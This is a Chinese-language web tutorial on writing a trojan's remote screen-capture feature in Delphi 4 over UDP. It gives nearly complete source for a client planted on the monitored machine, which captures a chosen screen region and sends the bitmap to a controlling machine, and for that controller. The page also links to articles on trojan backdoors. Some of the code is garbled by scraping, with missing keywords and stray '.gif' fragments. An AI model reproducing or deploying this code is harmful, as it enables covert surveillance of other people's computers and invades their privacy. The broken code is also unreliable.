udp协议:用UDP协议的木马编写思路方法

木马个很重要功能就是远程监视屏幕下面文章讲述了怎样利用UDP协议来实现而不是我们通常用到tcp/ip协议很有特色值得学 、软硬件要求 Windows95/98对等网用来监视计算机(以下简称主控机)和被监视计算机(以下简称受控机)都必须装有TCP/IP 协议并正确配置如没有网络也可以在台计算机上进行调试 2、实现思路方法 编制两个应用个为VClient.exe装在受控机上另个为VServer.exe装在主控机上VServer.exe指定要监视受控机IP地址和将要在受控机屏幕上抓取区域大小和位置并发出屏幕抓取指令给VClient.exeVClient.exe得到指令后在受控机屏幕上选取指定区域生成数据流将其发回主控机并在主控机上显示出抓取区域BMP图象由以上过程可以看出该思路方法关键有 2:是如何在受控机上进行屏幕抓取 2是如何通过TCP/IP协议在两台计算机中传输数据 UDP(User Datagram Protocol意为用户报文协议)是Internet上广泛采用通信协议的和TCP协议区别它是种非连接传输协议没有确认机制可*性不如TCP但它效率却比TCP高用于远程屏幕监视还是比较适合同时UDPControl控件不区分服务器端和客户端只区分发送端和接收端编程上较为简单故选用UDP协议使用Delphi 4.0提供TNMUDPControl控件 3、创建演示 第步编制VClient.exe文件新建Delphi工程将默认窗体Name属性设为“Client”加入TNMUDPControl控件Name属性设为“CUDP”；LocalPort属性设为“1111”让Control控件CUDP监视受控机1111端口当有数据发送到该口时触发Control控件CUDPOnDataReceived事件；RemotePort属性设为“2222”当Control控件CUDP发送数据时将数据发到主控机2222口在implementation后面加入变量定义 const BufSize=2048;{ 发送每笔数据缓冲区大小 } var BmpStream:TMemoryStream; LeftSize:Long;{ 发送每笔数据后剩余字节数 } 为ClientOnCreate事件添加代码: procedure TClient.FormCreate(Sender: TObject); begin BmpStream:=TMemoryStream.Create; end; 为ClientOnDestroy事件添加代码: procedure TClient.FormDestroy(Sender: TObject); begin BmpStream.Free; end; 为Control控件CUDPOnDataReceived事件添加代码: procedure TClient.CUDPDataReceived(Sender: TComponent; NumberBytes: Integer; FromIP: String); var CtrlCode:.gif' />[0..29] of char; Buf:.gif' />[0..BufSize-1] of char; TmpStr:; SendSize,LeftPos,TopPos,RightPos,BottomPos:eger; begin CUDP.ReadBuffer(CtrlCode,NumberBytes);{ 读取控制码 } CtrlCode[0]+CtrlCode[1]+CtrlCode[2]+CtrlCode[3]=’show’ then begin { 控制码前4位为“show”表示主控机发出了抓屏指令 } BmpStream.Size=0 then { 没有数据可发必须截屏生成数据 } begin TmpStr:=StrPas(CtrlCode); TmpStr:=Copy(TmpStr,5,Length(TmpStr)-4); LeftPos:=StrToInt(Copy(TmpStr,1,Pos(’:’,TmpStr)-1)); TmpStr:=Copy(TmpStr,Pos(’:’,TmpStr)+1,Length(TmpStr) -Pos(’:’,TmpStr)); TopPos:=StrToInt(Copy(TmpStr,1,Pos(’:’,TmpStr)-1)); TmpStr:=Copy(TmpStr,Pos(’:’,TmpStr)+1,Length(TmpStr)-Pos(’:’,TmpStr)); RightPos:=StrToInt(Copy(TmpStr,1,Pos(’:’,TmpStr)-1)); BottomPos:=StrToInt(Copy(TmpStr,Pos(’:’,TmpStr)+1,Length(TmpStr)-Pos’:’,TmpStr))); ScreenCap(LeftPos,TopPos,RightPos,BottomPos); { 截取屏幕 } end; LeftSize>BufSize then SendSize:=BufSize SendSize:=LeftSize; BmpStream.ReadBuffer(Buf,SendSize); LeftSize:=LeftSize-SendSize; LeftSize=0 then BmpStream.Clear;{ 清空流 } CUDP.RemoteHost:=FromIP; { FromIP为主控机IP地址 } CUDP.SendBuffer(Buf,SendSize); { 将数据发到主控机2222口 } end; end;


其中ScreenCap是自定义截取屏幕指定区域代码如下: procedure TClient.ScreenCap(LeftPos,TopPos, RightPos,BottomPos:eger); var RectWidth,RectHeight:eger; SourceDC,DestDC,Bhandle:eger; Bitmap:TBitmap; begin RectWidth:=RightPos-LeftPos; RectHeight:=BottomPos-TopPos; SourceDC:=CreateDC(’DISPLAY’,’’,’’,nil); DestDC:=CreateCompatibleDC(SourceDC); Bhandle:=CreateCompatibleBitmap(SourceDC, RectWidth,RectHeight); SelectObject(DestDC,Bhandle); BitBlt(DestDC,0,0,RectWidth,RectHeight,SourceDC, LeftPos,TopPos,SRCCOPY); Bitmap:=TBitmap.Create; Bitmap.Handle:=BHandle; BitMap.SaveToStream(BmpStream); BmpStream.Position:=0; LeftSize:=BmpStream.Size; Bitmap.Free; DeleteDC(DestDC); ReleaseDC(Bhandle,SourceDC); end;


存为“C:\VClient\ClnUnit.pas”和“C:\VClient\VClient.dpr”并编译 第 2步编制VServer.exe文件 新建Delphi工程将窗体Name属性设为“Server”加入TNMUDPControl控件Name属性设为“SUDP”；LocalPort属性设为“2222”让Control控件SUDP监视主控机2222端口当有数据发送到该口时触发Control控件SUDPOnDataReceived事件；RemotePort属性设为“1111”当Control控件SUDP发送数据时将数据发到受控机1111口加入Control控件Image1Align属性设为“alClient”；加入Control控件Button1Caption属性设为“截屏”；加入Control控件Label1Caption属性设为“左:上:右:下”；加入Control控件Edit1Text属性设为“0:0:100:100”；加入Control控件Label2Caption属性设为“受控机IP地址”；加入Control控件Edit2Text属性设为“127.0.0.1”； 在implementation后面加入变量定义 const BufSize=2048; var RsltStream,TmpStream:TMemoryStream; 为ServerOnCreate事件添加代码: procedure TServer.FormCreate(Sender: TObject); begin RsltStream:=TMemoryStream.Create; TmpStream:=TMemoryStream.Create; end; 为ClientOnDestroy事件添加代码: procedure TServer.FormDestroy(Sender: TObject); begin RsltStream.Free; TmpStream.Free; end; 为Control控件Button1onClick事件添加代码: procedure TServer.Button1Click(Sender: TObject); var ReqCode:.gif' />[0..29] of char;ReqCodeStr:; begin ReqCodeStr:=’show’+Edit1.Text; StrpCopy(ReqCode,ReqCodeStr); TmpStream.Clear; RsltStream.Clear; SUDP.RemoteHost:=Edit2.Text; SUDP.SendBuffer(ReqCode,30); end; 为Control控件SUDPOnDataReceived事件添加代码: procedure TServer.SUDPDataReceived(Sender: TComponent; NumberBytes: Integer; FromIP: String); var ReqCode:.gif' />[0..29] of char;ReqCodeStr:; begin ReqCodeStr:=’show’+Edit1.text; StrpCopy(ReqCode,ReqCodeStr); SUDP.ReadStream(TmpStream); RsltStream.CopyFrom(TmpStream,NumberBytes); NumberBytes< BufSize then { 数据已读完 } begin RsltStream.Position:=0; Image1.Picture.Bitmap.LoadFromStream(RsltStream); TmpStream.Clear; RsltStream.Clear; end begin TmpStream.Clear; ReqCode:=’show’; SUDP.RemoteHost:=Edit2.Text; SUDP.SendBuffer(ReqCode,30); end; end;


存为“C:\VServer\SvrUnit.pas”和“C:\VServer\VServer.dpr”并编译 4、测试 1、本地机测试:在本地机同时运行Vserver.exe和VClient.exe利用默认设置即可实现截屏查看“控制面板”-“网络”-“TCP/IP”-“IP地址”将“客户IP地址”设为该地址 同样正常运行 2、远程测试:选台受控机运行VClient.exe；另选台主控机运行VServer.exe将“受控机IP地址”即Edit2内容设为受控机IP地址“截屏”即可以上简要介绍了远程屏幕抓取实现思路方法至于在主控机上屏同时监视多个受控机读者可自行完善以上在Windows98对等网、Delphi 4.0下调试通过

上篇文章: 自己来做服务级木马后门

下篇文章: 详细解析Windows按键突破专家原理

Tags:  tcpudp协议 什么是udp协议 udp协议详解 udp协议

延伸阅读

• 2010-12-8-- udp协议的实现,Java中实现UDP协议编程的方法
• 2009-1-15-- vbudp:在VB中利用UDP协议编写聊天程序
• 2009-2-12-- vb.netudp:在VB中利用UDP协议编写聊天程序
• 2008-9-25-- vb.netudp:VB里面运用UDP协议设计聊天程序
• 2008-9-25-- 用户数据报协议:用户数据报协议(UDP)
• 2009-2-23-- javaudp编程:在Java编程语言中实现UDP协议编程的思路方法
• 2009-2-12-- udp协议:Java编程语言中实现UDP协议编程
• 2009-1-9-- udp协议:Visual C#实现网络对时系统——UDP协议的实际应用
• 2008-9-10-- 发送udp数据:使用UDP协议发送和接收数据